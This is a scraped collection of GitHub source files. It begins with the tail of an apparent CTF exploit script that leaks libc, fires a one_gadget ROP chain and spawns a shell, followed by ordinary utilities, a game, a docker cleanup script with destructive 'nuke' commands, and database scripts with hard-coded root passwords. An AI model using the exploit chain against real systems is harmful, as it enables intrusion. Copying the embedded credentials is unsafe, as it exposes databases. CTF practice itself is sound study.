ret_addr: pop_rdi,\n ret_addr+0x8: p_got_read,\n ret_addr+0x10: p_plt_puts,\n ret_addr+0x18: p_last_chance#,\n #new_canary_offset: 0xAAAAAAAAAAAAAAAA,\n #saved_canary_offset: 0xAAAAAAAAAAAAAAAA\n },\n word_size = 64,\n filler = b'\\0',\n length = 0x8F8\n )\n\n log.info('Sending the 1st exploit to get a LIBC address...')\n io.sendline(payload)\n recv_line = io.recvline()\n recv_line = io.recvline().strip()\n libc_leak = int.from_bytes(recv_line, 'little')\n\n LIBC_LOCAL_BASE = 0x7ffff77c3000\n LIBC_LOCAL_LEAK = 0x7ffff7bc5430\n LIBC_BASE_OFFSET = LIBC_LOCAL_LEAK - LIBC_LOCAL_BASE\n libc_base = libc_leak - LIBC_BASE_OFFSET\n io.info(f'LIBC base: {hex(libc_base)}')\n\n # ONE_GADGET_1 = libc_base + 0x4f3d5\n ONE_GADGET_2 = libc_base + 0x4f432\n # ONE_GADGET_3 = libc_base + 0x10a41c\n\n # leak LIBC address\n payload = flat(\n {\n ret_addr: ONE_GADGET_2#,\n #new_canary_offset: 0x0,\n #saved_canary_offset: 0x0\n },\n word_size = 64,\n filler = b'\\0',\n length = 0x8F8\n )\n\n log.info('Sending the 2nd exploit with one gadget ROP...')\n io.sendline(payload)\n\nlog.info('Paying for the game to start...')\nenter_game()\n\nlog.info('Skip main games...')\nskip_main_games()\n\nlog.info('Skip additional game...')\nskip_additional_roulette()\n\nlog.info('Trying to get binary image base...')\nimage_base = get_image_base()\n\nlog.info(f\"Found binary image base: {hex(image_base)}\")\n\nlog.info('Prepare exploit...')\nexploit(image_base)\n\nlog.info('Spawning shell...')\nio.interactive()\n","repo_name":"AndyWatterman/CTF-Writeups","sub_path":"HTB/CosyCasino/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70550049973","text":"from langchain.chains import RetrievalQA\nfrom langchain.chains.base import Chain\nfrom langchain.document_loaders import TextLoader\nfrom langchain.indexes.vectorstore import VectorstoreIndexCreator\nfrom langchain.schema.embeddings import Embeddings\nfrom langchain.schema.language_model import BaseLanguageModel\nfrom langchain.text_splitter import TextSplitter\n\n\nclass SampleQA:\n \"\"\"Define the flow of the model to be adjusted.\"\"\"\n\n def __init__(\n self,\n data_path: str,\n embedding: Embeddings,\n text_splitter: TextSplitter,\n llm: BaseLanguageModel,\n ) -> None:\n \"\"\"Input the elements necessary for LLM flow The arguments here will be used as a\n hyperparameters and optimized.\n\n the arguments are 
defined by `configs/model/sample.yaml`\n \"\"\"\n self.embedding = embedding\n self.text_splitter = text_splitter\n self.text_loader = TextLoader(data_path)\n self.llm = llm\n self.index = VectorstoreIndexCreator(\n embedding=self.embedding, text_splitter=self.text_splitter\n ).from_loaders([self.text_loader])\n\n self.chain = RetrievalQA.from_chain_type(\n self.llm,\n retriever=self.index.vectorstore.as_retriever(),\n return_source_documents=True,\n )\n\n def __call__(self, question: str) -> str:\n \"\"\"Answer the question.\"\"\"\n return self.chain(question)\n\n def get_chain(self) -> Chain:\n \"\"\"Get langchain chain.\"\"\"\n return self.chain\n","repo_name":"Yongtae723/LLMFlowOptimizer","sub_path":"llmflowoptimizer/component/model/sample_qa.py","file_name":"sample_qa.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"70687185013","text":"#!/opt/venv/bin/python\nfrom argoss_libs.snmp.probe import SNMPProbe\nfrom argoss_libs.snmp.skeletton import SNMPSkeletton\nimport nagiosplugin\n\n\nclass DellTemp(SNMPProbe):\n def probe(self):\n oid = '1.3.6.1.4.1.674.10892.1.700.20.1.6.1.1'\n alert_temp = float(self.argoss_snmp.fetch_oid(oid))\n yield nagiosplugin.Metric('alert_temp',\n round(alert_temp / 10.0, 1),\n None,\n context='alert_temp')\n\n\ndef main():\n argp = SNMPSkeletton.default_args('Check temperature on Dell.')\n args = argp.parse_args()\n check = nagiosplugin.Check(\n DellTemp(args.host, args.port, args.community, args.version),\n nagiosplugin.ScalarContext('alert_temp',\n args.warning,\n args.critical))\n check.main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"aurimukas/icinga2_plugins","sub_path":"old/check_dell_temp.py","file_name":"check_dell_temp.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"386537257","text":"import random\n\n\nclass SnakeLadderGame:\n # default board_game\n board_game_default = [\n [-1, 78, -1, -1, -1, 75, -1, 73, -1, -1],\n [-1, -1, -1, -1, -1, -1, 24, -1, -1, -1],\n [-1, -1, -1, -1, -1, -1, -1, -1, -1, 91],\n [-1, 19, 81, 60, -1, -1, -1, -1, -1, -1],\n [-1, -1, -1, -1, -1, -1, 34, -1, -1, 67],\n [-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],\n [59, -1, -1, -1, -1, -1, -1, -1, -1, -1],\n [-1, -1, -1, -1, -1, -1, -1, 84, -1, -1],\n [38, -1, -1, 7, -1, -1, -1, -1, -1, -1],\n [-1, -1, -1, 14, -1, -1, -1, -1, 31, -1],\n ]\n\n def __init__(self, players, board=None):\n \"\"\"\n constructor of Game\n :param players: list of players playing the game\n :param board: snake ladder board - by default there is given one board\n board in the form of -1 and values\n -1 denotes no snake and ladder\n value denotes the jump to or push down to that value\n\n values:\n winner = winner of this game\n size = length of the board\n pos_board = display the board in which each player position is given by its id\n \"\"\"\n if board is None:\n board = SnakeLadderGame.board_game_default\n self.players = players\n self.winner = None\n self.board_game = board\n self.size = len(self.board_game)\n self.pos_board = list(([-1] * self.size) for i in range(self.size))\n\n def pos_board_display(self):\n \"\"\" display the board in which each player position is given by its id \"\"\"\n for row in self.pos_board:\n for col in row:\n print(col, end=\" \")\n print()\n\n @property\n def board_game(self):\n \"\"\" board game getter \"\"\"\n return self.__board_game\n\n 
@board_game.setter\n def board_game(self, board):\n \"\"\" board game setter \"\"\"\n self.__board_game = board\n\n @property\n def size(self):\n \"\"\" size getter\"\"\"\n return self.__size\n\n @size.setter\n def size(self, size):\n \"\"\"size setter\"\"\"\n self.__size = size\n\n @property\n def roll_dice(self):\n \"\"\"\n :return: random integer between 1 and 6 (both inclusive)\n \"\"\"\n return random.randint(1, 6)\n\n @property\n def players(self):\n \"\"\"\n getter\n :return:list of players\n \"\"\"\n return self.__players\n\n @players.setter\n def players(self, players):\n \"\"\" setter\n :param players: list of players\n :return: None\n \"\"\"\n self.__players = players\n\n @property\n def winner(self):\n \"\"\" returns the winner of that game \"\"\"\n return self.__winner\n\n @winner.setter\n def winner(self, player):\n \"\"\" setter of the winner of that board\"\"\"\n self.__winner = player\n\n def placed(self, x, y, player):\n \"\"\"\n place the player into new position\n\n :param x: x coordinates\n :param y: y coordinates\n :param player: current player turn\n :return: whether curr player cuts the giti or not\n \"\"\"\n player.pos = [x, y]\n flag = False\n # some player is already in that position and that player is not current player ( snakes bites and move to\n # current position )\n if self.pos_board[x][y] != -1 and self.pos_board[x][y] != player.unique_id:\n pl_id = self.pos_board[x][y]\n print(\"It cuts the giti of \" + self.players[pl_id].name + \" and get another chance of rolling a dice .\")\n self.players[pl_id].pos = None\n flag = True\n self.pos_board[x][y] = player.unique_id\n return flag\n\n def calculate_target_value(self, x, y):\n \"\"\"\n find out the number on the board from the coordinates\n\n some examples are (board size 10 * 10 ):\n (9,8) -> 9\n (3,5) -> 66\n\n :param x: x coordinate\n :param y: y coordinate\n\n :return: value on the board after conversion\n \"\"\"\n n = self.size - 1\n # print(\"(\" + str(x) + \",\" + str(y) + \")-->\", end=\" \")\n x = n - x\n if x % 2 != 0:\n y = n - y\n value = (x * (n + 1)) + y + 1\n # print(str(value))\n return value\n\n def calculate_position(self, value):\n \"\"\"\n find out the coordinates x and y from the number on the board\n\n some examples are (board size 10 * 10 ):\n 9 - > (9,8)\n 66 -> (3,5)\n\n :param value: the number on the board\n\n :return: x and y coordinates of the board after conversion\n \"\"\"\n n = self.size\n x = int((value - 1) / n)\n y = int((value - 1) % n)\n if x % 2 != 0:\n y = n - 1 - y\n x = n - 1 - x\n # print(str(value)+\"---->\"+\"(\" + str(x) + \",\" + str(y) + \")\")\n return x, y\n\n def move(self, player):\n \"\"\"\n this is the main function in which\n player first roll the dice then move to the new position and checks accordingly\n if it gets 6 on dice it gets another chance\n and also on a new position if there is another player it cuts the giti of the that player\n \"\"\"\n dice = self.roll_dice # random value on the dice from 1 and 6\n print(\" rolls a dice and get number \" + str(dice), end=\", \")\n new_turn = False # new turn whenever player cuts the giti of another player\n if player.pos is None: # player is at home\n if dice == 1 or dice == 6: # when player open its giti only on 6 and 1\n print(\"and opens its giti \", end=\", \")\n player.pos = [self.size - 1, -1] # set the position to bottommost leftmost corner\n else: # didn't open its giti\n print(\"but is at home \", end=\", \")\n\n else:\n x, y = player.pos # current position of that player\n n = self.size # size of 
the board\n curr_val = self.calculate_target_value(x, y) # value of the board on that coordinates x and y\n tar_val = curr_val + dice # new value in which player to move\n if tar_val <= n * n: # when the move is possible on the board\n new_x, new_y = self.calculate_position(tar_val)\n if self.board_game[new_x][new_y] == -1: # no snake or ladder on that position\n print(\"and move from \" + str(curr_val) + \" to \" + str(tar_val), end=\", \")\n new_turn = self.placed(new_x, new_y, player) # place the player to that position and return\n # whether it cuts the giti of another player\n else: # exist snake or ladder in that position\n print(\"and move from \" + str(curr_val) + \" to \" + str(tar_val), end=\", \")\n value = tar_val # position at which snake or ladder exist\n tar_val = self.board_game[new_x][new_y] # the new position after snake bites or ladder jump\n if value < tar_val: # ladder:- new value greater than old\n print(\"and ladder @ \" + str(value) + \": jump to \" + str(tar_val), end=\", \")\n else: # snake :- new value is smaller than current value\n print(\"and Snake bites @ \" + str(value) + \": push down to \" + str(tar_val), end=\", \")\n new_x, new_y = self.calculate_position(tar_val) # calculate the x and y from the value\n new_turn = self.placed(new_x, new_y, player) # place the player to that position and return\n # whether it cuts the giti of another player\n # when the player is not at home and change its previous position to -1 that is reset in the pos board\n if y != -1:\n self.pos_board[x][y] = -1\n # this player reach the destination and declared as winner\n if tar_val == (n * n):\n self.winner = player # set the winner of this game\n player.win = True # change the status of the player to winner\n return\n\n else: # when move is not possible\n print(\"new position is \" + str(tar_val) + \" which is not possible on the board \", end=\" \")\n return\n if new_turn: # when again turn when players cuts the giti of another player\n self.move(player)\n elif dice == 6: # again turn when there is 6 on dice\n print(\"and gets another chance as 6 on the last dice roll\")\n self.move(player)\n\n def start(self):\n \"\"\" start the game with player 1 and so on \"\"\"\n idx = 0 # starting from index 0\n curr_player = self.players[idx] # curr _palyer starts from player 1\n rounds = 0 # number of rounds in a game\n while not curr_player.win:\n if idx == 0:\n rounds += 1\n curr_player = self.players[idx]\n print(curr_player.name + \" turns : \")\n self.move(curr_player)\n idx += 1 # next player turn\n idx = idx % len(self.players) # after last player then player 1 gets turn\n print()\n return rounds\n","repo_name":"piyush1998gupta/snake_ladder_game","sub_path":"snake_ladder.py","file_name":"snake_ladder.py","file_ext":"py","file_size_in_byte":9267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72084801653","text":"from __future__ import print_function\nimport re\nimport os\n\ndef log(*args, **kwargs):\n _log_real(*map(str, args), **kwargs)\n\n_debug_level = int(os.environ.get('DEBUG', 0))\n\ndef _log_real(*args, **kwargs):\n level = kwargs.get('level', 0)\n if level <= _debug_level:\n print(*args)\n\nclass Exit(BaseException):\n pass\n\nimport re\n_quote_pos = re.compile('(?=[^-0-9a-zA-Z_./\\n])')\n\ndef shell_quote(arg):\n if arg:\n return _quote_pos.sub('\\\\\\\\', arg).replace('\\n',\"'\\n'\")\n else:\n return \"''\"\n\ndef list_to_command(args):\n return ' '.join(map(shell_quote, args))\n\ndef as_utf8(arg):\n if 
isinstance(arg, str):\n return arg\n else:\n return arg.encode('utf8')\n\ndef trim_long_string(text, limit=20):\n if len(text) > limit:\n return text[:limit-3] + '...'\n else:\n return text\n\nclass Enum(set):\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n","repo_name":"zielmicha/viewsh","sub_path":"viewsh/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19343440611","text":"__pragma__(\"alias\",\"s\",\"$\")\nfrom Widget import Widget\nfrom Popup import Popup\nfrom SwiperSlider import SwiperSlider\nfrom BoxText import BoxText\nclass PopupExplication(Widget):\n\t\"\"\"docstring for Button\"\"\"\n\tdef __init__(self, titulo=\"Presionar\"):\n\t\tPopup.__init__(self,titulo)\n\t\tself._html=\"\"\"\n\t\t
\n\t\t\"\"\"\n\t\tself.target.find(\">.content\").html(self._html)\n\t\tself.slider=SwiperSlider()\n\t\tself.BoxText=BoxText()\n\n\n\t\t\n\t\t\n\tdef titulo(self,titulo):\n\t\tself.target.find(\".titulo\").text(titulo)\n\t\tself._titulo=titulo\n\n\tdef update(self):\n\t\tself.format=[self._titulo]\n\t\tself.__update__()\n\t\tself.__titulo=self.target.find(\">.titulo\")\n\t\tself.titulo(self._titulo)\n\t\tself.slider.update()\n\t\tself.BoxText.update()\n\t\ts(self.target.find(\".>content\").find(\">.container\").find(\">.row\").find(\">.col-md-6\")[0]).html(self.slider.target)\n\t\ts(self.target.find(\".>content\").find(\">.container\").find(\">.row\").find(\">.col-md-6\")[1]).html(self.BoxText.target)\n\t\t\n\t\n\t\n\t\t\n\n\n\t\t","repo_name":"ZerpaTechnology/asenzor-v2","sub_path":"Components/PopupExplication.py","file_name":"PopupExplication.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24390671558","text":"#!/usr/bin/env python\n\n# import cmd\nimport os\n# import argparse\nimport sys\nfrom colorama import Fore, Back\n\n__version__ = \"0.0.1\"\n\ndef cmd_line(s):\n print(Fore.GREEN + \">> \" + s + Fore.RESET)\n ret = os.popen(s).read()\n print(ret)\n\n# def handle_args():\n# parser = argparse.ArgumentParser(description=\"This is a cool program\")\n# parser.add_argument(\"cmd\", help=\"command: status\")\n# # parser.add_argument(\"-V\", \"--version\", help=\"show program version\", action=\"store_true\")\n# args = parser.parse_args()\n# return args\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 2:\n print(Fore.RED + f\"*** Error: {sys.argv[0]} takes 1 argument ***\")\n exit(1)\n\n arg = sys.argv[1]\n cmds = None\n\n if arg == \"status\":\n cmds = [\n \"docker ps\",\n \"docker images\",\n \"docker system df -v\"\n ]\n\n elif arg == \"version\":\n print(sys.argv[0], __version__)\n\n elif arg == \"build\":\n NAME = \"pi-opencv\"\n VERSION = \"0.5.0\"\n cmds = [\n f\"docker build -t walchko/{NAME}:{VERSION} .\",\n f\"docker images walchko/{NAME}\"\n ]\n\n elif arg == \"clean\":\n cmds = [\n \"docker volume rm $(docker volume ls -qf dangling=true) $(docker ps -a -q)\", # delete orphaned/dangling volumes\n \"docker rmi $(docker images -q -f dangling=true)\" # delete dangling/untagged images\n # docker rm $(docker ps -a -q)\n ]\n\n elif arg == \"nuke\":\n print(\">> nuke everything ... 
ha ha ha!!\")\n cmds = [\n \"docker kill $(docker ps -q)\", # kill all running containers\n \"docker stop $(docker ps -a -q)\",\n \"docker rm $(docker ps -a -q)\", # delete all containers\n \"docker system prune -a -f\",\n \"docker images prune -a\",\n \"docker volume prune -f\",\n \"docker container prune -f\",\n \"docker rmi $(docker images -a -q)\" # delete all images\n ]\n else:\n print(Fore.RED + f\"*** Unknown command: {arg} ***\" + Fore.RESET)\n\n if cmds:\n for c in cmds:\n a = cmd_line(c)\n print(a)\n print(\"-\"*40)\n","repo_name":"MomsFriendlyRobotCompany/dpkg_opencv","sub_path":"docker/archive/ds.py","file_name":"ds.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29565874274","text":"import sqlString as sql\nimport pymysql\nimport numpy as np\nimport csv\n\ndef has_key(dictionary, key):\n\tif(key in dictionary):\n\t\treturn 1\n\treturn 0\n\nconn=pymysql.connect(db='ca', user='root', passwd='mickey94378', charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)\n\ndef CountHistoryCos(grade):\n\tisFour=0\n\tif grade==\"四\":\n\t\ttarget_grade=\"四\"\n\t\tisFour=1\n\telif grade=='三':\n\t\ttarget_grade=\"四\"\n\telif grade=='二':\n\t\ttarget_grade=\"三\"\n\telif grade=='一':\n\t\ttarget_grade=\"二\"\n\n\tcursor=conn.cursor()\n\tcursor.execute(sql.FindAllCos)\n\tresult=cursor.fetchall()\n\n\tgrade_dict={}\n\tfor i in range(len(result)):\n\t\tif not isFour and result[i]['grade']==target_grade and result[i]['unique_id'][:5]=='107-1':\n\t\t\tkey=result[i]['unique_id']\n\t\t\tif has_key(grade_dict, key)==1:\n\t\t\t\tgrade_dict[key]['count']=grade_dict[key]['count']+1\n\t\t\telse:\n\t\t\t\tgrade_dict[key]=result[i]\n\t\t\t\tgrade_dict[key]['count']=1\n\t\telse:\n\t\t\t# 大四\n\t\t\tif result[i]['study_status']==\"畢業\" and result[i]['grade']==target_grade and result[i]['unique_id'][:5]=='106-2':\n\t\t\t\tkey=result[i]['unique_id']\n\t\t\t\tif has_key(grade_dict, key)==1:\n\t\t\t\t\tgrade_dict[key]['count']=grade_dict[key]['count']+1\n\t\t\t\telse:\n\t\t\t\t\tgrade_dict[key]=result[i]\n\t\t\t\t\tgrade_dict[key]['count']=1\n\treturn grade_dict\n\n# Compare course on current semester\ndef CompareCurrentCos(dict_old):\n\tcursor=conn.cursor()\n\tcursor.execute(sql.FindCurrentCos)\n\tcurrentCos=cursor.fetchall()\n\n\thot_cos={}\n\tfor key, value in dict_old.items():\n\t\tunique_id=key\n\t\told_cname=value['cos_cname']\n\t\told_tname=value['tname']\n\t\told_count=value['count']\n\t\t\n\t\tif(old_count>0):\n\t\t\tfor i in range(len(currentCos)):\n\t\t\t\tif currentCos[i]['cos_cname']==old_cname and currentCos[i]['tname']==old_tname:\n\t\t\t\t\thot_cos[old_cname]={}\n\t\t\t\t\turl=\"https://timetable.nctu.edu.tw/?r=main/crsoutline&Acy=107&Sem=2&CrsNo={}&lang=zh-tw\".format(currentCos[i]['cos_id'])\n\t\t\t\t\thot_cos[old_cname]['unique_id']=unique_id\n\t\t\t\t\thot_cos[old_cname]['count']=old_count\n\t\t\t\t\thot_cos[old_cname]['url']=url\n\treturn hot_cos\n\ndef InsertCos(grade, grade_dict):\n\tcursor=conn.cursor()\n\tcursor.execute(sql.DeleteRecord, {'grade': grade})\n\tfor key, value in grade_dict.items():\n\t\tdata={}\n\t\tdata['grade']=grade\n\t\tdata['unique_id']=value['unique_id']\n\t\tdata['count']=int(value['count'])\n\t\tdata['url']=value['url']\n\t\tcursor.execute(sql.InsertCos, data)\n\t\tconn.commit()\n\nlist_grade=['一', '二', '三', '四']\ndict_temp={}\n\nfor grade in list_grade:\n\tprint(\"Now calculate 
大{}...\".format(grade))\n\tdict_temp=CountHistoryCos(grade)\n\tdict_temp=CompareCurrentCos(dict_temp)\n\tprint(\"Insert to db...\")\n\tInsertCos(grade, dict_temp)\n\nprint(\"Success!\")\n\n\n\n","repo_name":"NCTU-dinodino/Database","sub_path":"python/hot_cos/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35765514520","text":"from enum import IntEnum\n\nfrom ray.serve.exceptions import RayServeException\n\n\nclass TaskContext(IntEnum):\n \"\"\"TaskContext constants for queue.enqueue method\"\"\"\n Web = 1\n Python = 2\n\n\n# Global variable will be modified in worker\n# web == True: currrently processing a request from web server\n# web == False: currently processing a request from python\nweb = False\n\n# batching information in serve context\n# batch_size == None : the backend doesn't support batching\n# batch_size(int) : the number of elements of input list\nbatch_size = None\n\n_not_in_web_context_error = \"\"\"\nAccessing the request object outside of the web context. Please use\n\"serve.context.web\" to determine when the function is called within\na web context.\n\"\"\"\n\n\nclass FakeFlaskRequest:\n def __getattribute__(self, name):\n raise RayServeException(_not_in_web_context_error)\n\n def __setattr__(self, name, value):\n raise RayServeException(_not_in_web_context_error)\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/serve/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"2417248337","text":"from lib.game import Game\nfrom lib.node import Node\nfrom lib.neural_network import Residual\nfrom lib.tree_search import MCTS\nfrom termcolor import colored\nfrom lib.human import Human\n\n\ndef print_board(board):\n for i in range(8):\n for j in range(8):\n if board[i][j] in set([-1, -2]):\n print(colored('(' + str(i) + ',' + str(j) + ')' + str(board[i][j]), 'red'), end='\\t')\n elif board[i][j] in set([1, 2]):\n print(colored('(' + str(i) + ',' + str(j) + ')' + str(board[i][j]), 'green'), end='\\t')\n else:\n print(colored('(' + str(i) + ',' + str(j) + ')' + str(board[i][j]), 'white'), end='\\t')\n print('')\n pass\n\n\nif __name__ == '__main__':\n net = Residual()\n net.load_model('models/model11')\n tree_search_1 = MCTS(net, Node())\n human = Human()\n game = Game()\n print('Game has started !')\n print_board(game.state)\n step = 1\n\n while game.check_game_over() == 0:\n clone = game.clone()\n # Player 1\n if step % 2 != 0:\n predicted_action, temp_children, temp_moves = tree_search_1.search(game.clone())\n game.play_action(predicted_action)\n print('Computer moved:', end='\\t')\n print('(' + str(predicted_action[0]) + ',' + str(predicted_action[1]) + ') -> (' + str(\n predicted_action[2]) + ',' +\n str(predicted_action[3]) + ')')\n if clone.if_attack_move(predicted_action):\n while game.attack_move_available(game.remove_except_current(predicted_action)):\n predicted_action, temp_children, temp_moves = tree_search_1.search(game.clone(), chain_move=True,\n action=predicted_action)\n game.play_action(predicted_action)\n print('Computer moved:', end='\\t')\n print('(' + str(predicted_action[0]) + ',' + str(predicted_action[1]) + ') -> (' + str(\n predicted_action[2]) + ',' +\n str(predicted_action[3]) + ')')\n\n # Player 2\n else:\n print_board(game.state)\n selected_move = human.get_move(game, 
chain=False)\n game.play_action(selected_move)\n print('Human moved:', end=\"\\t\")\n print('(' + str(selected_move[0]) + ',' + str(selected_move[1]) + ') -> (' + str(selected_move[2]) + ',' +\n str(selected_move[3]) + ')')\n if clone.if_attack_move(selected_move):\n while game.attack_move_available(\n game.remove_non_attacks(game.remove_except_current(selected_move))):\n selected_move = human.get_move(game, chain=True, prev_move=selected_move)\n game.play_action(selected_move)\n print('Human moved:', end=\"\\t\")\n print('(' + str(selected_move[0]) + ',' + str(selected_move[1]) + ') -> (' + str(\n selected_move[2]) + ',' +\n str(selected_move[3]) + ')')\n game.flip_perspective()\n step += 1\n if step > 120:\n break\n draw = True\n if draw:\n print('It is a Draw !')\n elif step % 2 == 0:\n print('Computer Won')\n else:\n print('Human Won')\n","repo_name":"shieda4/Thesis","sub_path":"against_human.py","file_name":"against_human.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10480168351","text":"import socket\nimport pickle\nSERVER_IP = \"192.168.0.136\"\n\n\nclass Network:\n def __init__(self, id_user=None):\n self.connector = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server = SERVER_IP\n self.id = id_user\n self.port = 5050\n self.server_address = (self.server, self.port)\n self.status = \"not connected\"\n self.user_created_status = None\n\n def connect(self):\n self.connector.connect(self.server_address)\n self.status = self.connector.recv(4096).decode()\n self.connector.send(str.encode(self.id))\n return self.connector.recv(4096).decode()\n\n def send(self, user, data):\n\n if user and data:\n self.connector.send(pickle.dumps(f\"{user}|{self.id}|{data}\"))\n else:\n self.connector.send(pickle.dumps(\"no data\"))\n return pickle.loads(self.connector.recv(4096))\n","repo_name":"bdrab/TextCommunicator-Socket","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26843995020","text":"import mysql.connector\nfrom mysql.connector import errorcode\nfrom datetime import datetime\nimport random\n\ntry:\n\tcnx = mysql.connector.connect(user='root', password=\"asdf\", host=\"127.0.0.1\", database='RateMyTJ')\nexcept Exception as err:\n\tprint(err)\n\ncursor = cnx.cursor()\ncursor.execute(\"SELECT id, prereq, coreq FROM classes\")\n\nresult = cursor.fetchall()\n\nclasses = set()\nfor item in result:\n\tclasses.add(item[0])\n\nfile = open(\"next_class.txt\", \"w\")\n\nfor item in result:\n\tclasses_to_add = set()\n\tif item[1] is not None:\n\t\twords = item[1].split(' ')\n\t\tfor w in words:\n\t\t\tif w == \"\": continue\n\t\t\tif w[0] == '(':\n\t\t\t\tclasses_to_add.add(w[1:])\n\t\t\telif w[-1] == ')':\n\t\t\t\tclasses_to_add.add(w[:-1])\n\t\t\telse:\n\t\t\t\tif w in classes:\n\t\t\t\t\tclasses_to_add.add(w)\n\t\n\tif item[2] is not None:\n\t\tclasses_to_add.add(item[2])\n\n\tfor c in classes_to_add:\n\t\tfile.write('UPDATE classes SET next_class=CONCAT(next_class, \" %s\") WHERE id=\"%s\";\\n' % (item[0], c))\n\n\tprint(item[0])\n\tprint(classes_to_add)\n","repo_name":"superandybean/RateMyTJ","sub_path":"python scripts/next_class.py","file_name":"next_class.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 
+{"seq_id":"32516276965","text":"import statistics as s\n\nwhile True:\n\tlist1 = input(\"list : \")\n\tlist2 = []\n\tlist1 = list1.split(\";\")\n\n\tfor x in list1:\n\t\tx = x.replace('$', '')\n\t\tx = x.replace('\\qquad', '')\n\t\tlist2.append(float(x))\n\n\n\tdef moyenne(nb_point_virgule):\n\t\tprint(\"moyenne : {}\".format(s.mean(nb_point_virgule)))\n\n\n\tdef etendue(listnb):\n\t\tetendue = max(listnb) - min(listnb)\n\t\tprint(\"etendue : {0}\".format(etendue))\n\n\n\tetendue(list2)\n\tmoyenne(list2)\n","repo_name":"aLonelySquidNamedBob/Random-Projects","sub_path":"School/moyenne_+_etendue.py","file_name":"moyenne_+_etendue.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22125493081","text":"import time\nimport logging\nimport threading\n\nlog = logging.getLogger(f\"app.{__name__}\")\nstream_handler = logging.StreamHandler()\nformat = \"%(asctime)s %(levelname)s [%(name)s] [%(filename)s:%(lineno)d] - %(message)s\"\nstream_handler.setFormatter(logging.Formatter(format))\nlog.addHandler(stream_handler)\nlog.setLevel(logging.INFO)\n\n\ndef thread_func(name, d):\n \"\"\"메인 thread 가 끝나더라도 sub thread 가 작업을 완료함\"\"\"\n log.info(\"Sub-Thread %s : strting\", name)\n for i in d:\n time.sleep(0.1)\n print(i)\n log.info(\"Sub-Thread %s : finished\", name)\n\n\nif __name__ == \"__main__\":\n log.info(\"Main-Thread: before createing thread\")\n\n x = threading.Thread(target=thread_func, args=(\"first\", range(20000)), daemon=True)\n y = threading.Thread(target=thread_func, args=(\"two\", range(10000)), daemon=True)\n\n log.info(\"Main-Trhead : before running thread\")\n\n x.start()\n y.start()\n\n log.info(\"Main-Thread: wait for the thread to finish.\")\n\n log.info(\"Main-Thread: all done.\")\n","repo_name":"ricepotato/python-study","sub_path":"threading/th2.py","file_name":"th2.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18078487450","text":"import bs4 as bs\n# serialises any python object - save S& P 500 lsit without having to go back to wiki\nimport pickle\nimport requests\n\nimport datetime as dt\n# os can make new directories for us\nimport os\nimport pandas as pd\nimport pandas_datareader.data as web\n\n\ndef save_sp500_tickers():\n resp = requests.get('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\n soup = bs.BeautifulSoup(resp.text, 'lxml')\n table = soup.find('table', {'id':'constituents'})\n tickers = []\n for row in table.findAll('tr')[1:]:\n ticker = row.find('td').text.strip()\n if \".\" in ticker:\n ticker = ticker.replace('.', '-')\n print('ticker replaced to {}'.format(ticker))\n tickers.append(ticker)\n\n with open(\"sp500tickers.pickle\", \"wb\") as f:\n pickle.dump(tickers, f)\n\n print(\"Collected ticker data\")\n return tickers\n\ndef get_data_from_yahoo(reload_sp500=False):\n # saving this data locally to avoid 20/30 minute download from yahoo each iteration\n if reload_sp500:\n tickers = save_sp500_tickers()\n else:\n # wb = write bytes and rb = read bytes - ahhh!\n with open(\"sp500tickers.pickle\", \"rb\") as f:\n tickers = pickle.load(f)\n\n # checks is path exists and if not, creates it\n if not os.path.exists('stock_dfs'):\n os.makedirs('stock_dfs')\n\n start = dt.datetime(2000,1,1)\n end = dt.date.today()\n\n # for ticker in tickers[:25]: - this would select the first 25 companies in ticker list\n for ticker in tickers:\n if not 
